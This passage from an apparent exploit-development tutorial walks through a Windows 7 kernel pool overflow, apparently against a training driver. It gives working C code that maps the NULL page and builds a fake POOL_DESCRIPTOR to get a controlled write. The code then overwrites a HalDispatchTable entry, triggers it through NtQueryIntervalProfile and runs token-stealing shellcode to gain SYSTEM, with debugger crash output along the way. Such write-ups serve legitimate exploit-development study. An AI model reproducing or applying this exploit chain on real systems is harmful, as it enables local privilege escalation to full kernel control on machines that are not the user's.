You'll notice only the first five entries are valid pointers with the rest being NULL, that means if we overwrite the POOL_HEADER's PoolIndex field with a value greater than or equal to 5, when the object is free'd the kernel will try to reference a POOL_DESCRIPTOR starting at the NULL page. As before we can allocate the NULL page from user land and set the structures values in such a way that we can gain code execution. First of all lets overwrite the PoolIndex field and make sure the kernel crashes as expected.

lpInBuffer[0x1F8 / 4] = 0x06080a40;

//dt nt!_POOL_HEADER  
//  + 0x000 PreviousSize : Pos 0, 9 Bits  => 0x40  
//    + 0x000 PoolIndex : Pos 9, 7 Bits => 0x5 //Out of bounds
//    + 0x002 BlockSize Pos 0, 9 Bits => 0x8
//    + 0x002 PoolType : Pos 9, 7 Bits => 0x3 //Paged Pool
//    + 0x000 Ulong1 : Uint4B => 0x06400a40 (Just a union field)
//We stop overwriting after the first 4 bytes and leave the rest as default
//    + 0x004 PoolTag : Uint4B=> 0xee657645 => 'Even'
//    + 0x004 AllocatorBackTraceIndex : Uint2B => 0x7645
//    + 0x006 PoolTagHash : Uint2B => 0xee65

Now compiling and running the binary we get a crash.

Access violation - code c0000005 (!!! second chance !!!)  
nt!ExFreePoolWithTag+0x814:  
82b5f2cf 8b9380000000    mov     edx,dword ptr [ebx+80h]  
kd> r  
eax=00000008 ebx=00000000 ecx=82b68d20 edx=00000000 esi=000001ff edi=8455f830  
eip=82b5f2cf esp=9610fae8 ebp=9610fb44 iopl=0         nv up ei pl zr na pe nc  
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246  
nt!ExFreePoolWithTag+0x814:  
82b5f2cf 8b9380000000    mov     edx,dword ptr [ebx+80h] ds:0023:00000080=????????  

The kernel successfully crashed trying to access memory at an address of 0x0 + 0x80 while freeing a pool allocation. Now how do we go from controlling a Pool Descriptor to code execution?

Remembering from earlier in this article on Windows 7, the Pool Descriptor includes a PendingFrees list which will be free'd if it contains 32 or more entries. By faking a Pool Descriptor object we can make the PendingFrees list point to fake pool allocations which we control, and if we set the PendingFreesDepth to 32 or more the kernel will attempt to free them. The free'd objects addresses will be added to the ListHeads list, by creating fake entries in this list that point to a targeted address we want to overwrote, the address of the fake object that's just been free'd will be written to the Blink address of the first entry in the ListHeads list.

This allows us to write a controlled user mode address to any address in memory. For now lets get the kernel writing the fake object address to 0x41414141.

Hopefully some code will make this clearer. All of this code is placed before the pool spraying code.

First we allocate the NULL page as before.

HMODULE hNtdll = GetModuleHandle("ntdll.dll");

if (hNtdll == INVALID_HANDLE_VALUE) {  
    printf("Could not open handle to ntdll. \n");
    CloseHandle(hDriver);
    return 1;
}

//Get address of NtAllocateVirtualMemory from the dynamically linked library and then cast it to a callable function type
PNtAllocateVirtualMemory NtAllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");;

if (!NtAllocateVirtualMemory) {  
    printf("Failed Resolving NtAllocateVirtualMemory: 0x%X\n", GetLastError());
    return 1;
}

//We can't outright pass NULL as the address but if we pass 1 then it gets rounded down to 0...
PVOID baseAddress = (PVOID)0x1;  
SIZE_T regionSize = 0x2500; //Probably enough, it will get rounded up to the next page size  
                                // Map the null page
NTSTATUS ntStatus = NtAllocateVirtualMemory(  
        GetCurrentProcess(), //Current process handle
    &baseAddress, //address we want our memory to start at, will get rounded down to the nearest page boundary
    0, //The number of high-order address bits that must be zero in the base address of the section view. Not a clue here
    &regionSize, //Required size - will be modified to actual size allocated, is rounded up to the next page boundary
    MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, //claim memory straight away, get highest appropriate address
    PAGE_EXECUTE_READWRITE //All permissions
);

if (ntStatus != 0) {  
    printf("Virtual Memory Allocation Failed: 0x%x\n", ntStatus);
    return 1;
}

printf("Address allocated at: 0x%p\n", baseAddress);

printf("Allocated memory size: 0x%X\n", regionSize);  

Now we need to create the fake POOL_DESCRIPTOR structure starting at 0x0. I basically worked out how to do this by working backwards from Jeremy's solution, so I've just used his values here.

RtlZeroMemory((PCHAR)0x0, 0x1300);

//dt - r nt!_POOL_DESCRIPTOR    
*(PCHAR)0x0 = 1;
//+ 0x000 PoolType         : PagedPool = 0n1
*(PCHAR)0x4 = 1;
//+0x004 PagedLock        : _KGUARDED_MUTEX
*(PCHAR*)0x100 = (PCHAR)0x1208;
//+ 0x100 PendingFrees : 0x1208 //This address will be written to the targetted 'where' address

*(PCHAR*)0x104 = (PCHAR)0x20;
//+0x104 PendingFreeDepth : 0x20 - the pending free needs to be atleast 32 to so that ExFreePoolWithTag actually free's everything

for (unsigned int i = 0x140; i < 0x1140; i += 8) {  
    *(PCHAR*)i = (PCHAR)where - 4;
}
//+0x140 ListHeads : [512] _LIST_ENTRY
    //+ 0x000 Flink : (PCHAR)0x41414141 - 4
    //+ 0x004 Blink : (PCHAR)0x41414141- 4
    //And repeat...
//The addresses of the object on the PendingFrees list which is currently 0x1208 will be written to 0x41414141 when it is linked into the front of the list

Finally we create the fake block at 0x1208, the corresponding POOL_HEADER needs to be at 0x1200.

*(PINT)0x1200 = (INT)0x060c0a00;
*(PINT)0x1204 = (INT)0x6f6f6f6f;
//dt nt!_POOL_HEADER 0x1200
//+0x000 PreviousSize     : 0y000000000(0)
//    + 0x000 PoolIndex : 0y0000101(0x5)
//    + 0x002 BlockSize : 0y000001100(0xc)
//    + 0x002 PoolType : 0y0000011(0x3)
//    + 0x000 Ulong1 : 0x60c0a00
//    + 0x004 PoolTag : 0x6f6f6f6f
//    + 0x004 AllocatorBackTraceIndex : 0x6f6f
//    + 0x006 PoolTagHash : 0x6f6f
*(PCHAR*)0x1208 = (PCHAR)0x0; //next pointer

The fact that the memory at 0x1208 is a NULL pointer means that DeferedFree will free it and then stop, as there is no following entry.

We'll also need to create another fake POOL_HEADER immediately after the object to be free'd as when the memory manager is free'ing the preceding block it will validate that it's size is equal to the next blocks previous size field.

*(PINT)0x1260 = (INT)0x060c0a0c;
*(PINT)0x1264 = (INT)0x6f6f6f6f;
//dt nt!_POOL_HEADER 0x1260
//+0x000 PreviousSize     : 0y000001100(0xc)
//    + 0x000 PoolIndex : 0y0000101(0x5)
//    + 0x002 BlockSize : 0y000001100(0xc)
//    + 0x002 PoolType : 0y0000011(0x3)
//    + 0x000 Ulong1 : 0x60c0a0c
//    + 0x004 PoolTag : 0x6f6f6f6f
//    + 0x004 AllocatorBackTraceIndex : 0x6f6f
//    + 0x006 PoolTagHash : 0x6f6f

Now building and running the code, we get the error we expected.

Access violation - code c0000005 (!!! second chance !!!)  
nt!ExDeferredFreePool+0x2e3:  
82b60943 894604          mov     dword ptr [esi+4],eax  
kd> r  
eax=00001208 ebx=000001ff ecx=000001ff edx=00000198 esi=4141413d edi=00000000  
eip=82b60943 esp=a287faa0 ebp=a287fad8 iopl=0         nv up ei pl nz na po nc  
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202  
nt!ExDeferredFreePool+0x2e3:  
82b60943 894604          mov     dword ptr [esi+4],eax ds:0023:41414141=????????  

Here we can see 0x1208 being written to [esi+4], which is equal to 0x41414141, by ExDeferredFreePool. Now we need to overwrite something in memory which allow us to gain code execution. For this I chose to overwrite an entry in the HalDispatchTable as I did when exploiting the arbitrary overwrite vulnerability.

Once the entry has been overwritten triggering the correct function will cause the dispatch table entry to be used and the kernels code execution to be re-directed to where the fake pool allocation previously was (0x1208).

First of all we need to find the HalDispatch table address and the targeted entry we want to overwrite, in this case the second entry which is used when the NtQueryIntervalProfile function in ntdll is called.

PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");  
if (query == NULL) {  
    printf("GetProcAddress() failed.\n");
    return 1;
}
ULONG len = 0;  
query(SystemModuleInformation, NULL, 0, &len);  
PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);  
if (pModuleInfo == NULL) {  
    printf("Could not allocate memory for module info.\n");
    return 1;
}
query(SystemModuleInformation, pModuleInfo, len, &len);  
if (len == 0) {  
    printf("Failed to retrieve system module information\n");
    return 1;
}
PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;  
PCHAR kernelImage = (PCHAR)pModuleInfo->Modules[0].Name;  
kernelImage = strrchr(kernelImage, '\\') + 1;  
printf("Kernel Image Base 0x%X\n", kernelImageBase);  
printf("Kernel Image name %s\n", kernelImage);

HMODULE userBase = LoadLibrary(kernelImage);  
PVOID dispatch = (PVOID)GetProcAddress(userBase, "HalDispatchTable");  
dispatch = (PVOID)((ULONG)dispatch - (ULONG)userBase + (ULONG)kernelImageBase);  
printf("User Mode kernel image base address: 0x%X\n", userBase);  
printf("Kernel mode kernel image base address: 0x%X\n", kernelImageBase);  
printf("HalDispatchTable address: 0x%X\n", dispatch);

ULONG where = (ULONG)((ULONG)dispatch + sizeof(PVOID));  
printf("write address: 0x%X\n", where);  

Next we update the fake ListHeads entries to point at where.

for (unsigned int i = 0x140; i < 0x1140; i += 8) {  
    *(PCHAR*)i = (PCHAR)where - 4;
}
    //+0x140 ListHeads : [512] _LIST_ENTRY
        //+ 0x000 Flink : (PCHAR)where - 4
        //+ 0x004 Blink : (PCHAR)where - 4
        //And repeat...

Finally we place an 0xcc byte (the int 3 opcode) at 0x1208 to trigger a breakpoint and add a call to NtQueryIntervalProfile to call the function once we've cleaned everything up. The reason for the 0xCC byte
is that otherwise the bytes at 0x1208 are the opcodes for clc (0xf8) followed by ret (0xc3) which means nothing really happens and the OS continues fine.

printf("triggering payload\r\n");  
NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtdll, "NtQueryIntervalProfile");

if (!NtQueryIntervalProfile) {  
    printf("Failed Resolving NtQueryIntervalProfile. \n");
    return 1;
}
printf("Triggering shellcode\n");  
ULONG interval = 1;  
NtQueryIntervalProfile(2, &interval);  

We still haven't setup our shellcode but we should now have code execution at 0x1208. Running the code again we get exactly that!

// call pool page allocator if size is above 4080 bytes
if (NumberOfBytes > 0xff0) {  
// call nt!ExpAllocateBigPool
}

Final step is to setup the shellcode. Execution will be literally starting at 0x1208 so we can't just put a pointer there, instead we set up the following data, just before calling NtQueryIntervalProfile.

/*00001208 b8ADDRESS      mov     eax, what
0000120d ffd0            call    eax  
0000120f c9              leave  
00001210 c3              ret*/  
*(PUCHAR)0x1208 = 0xb8;
*(PINT)0x1209 = (ULONG)&TokenStealingShellcodeWin7Generic;
*(PUCHAR)0x120D = 0xff;
*(PUCHAR)0x120E = 0xd0;
*(PUCHAR)0x120F = 0xc9;
*(PUCHAR)0x1210 = 0xc3;

Now recompiling and running the code we get SYSTEM :)

The final/full code for the exploit is on Github.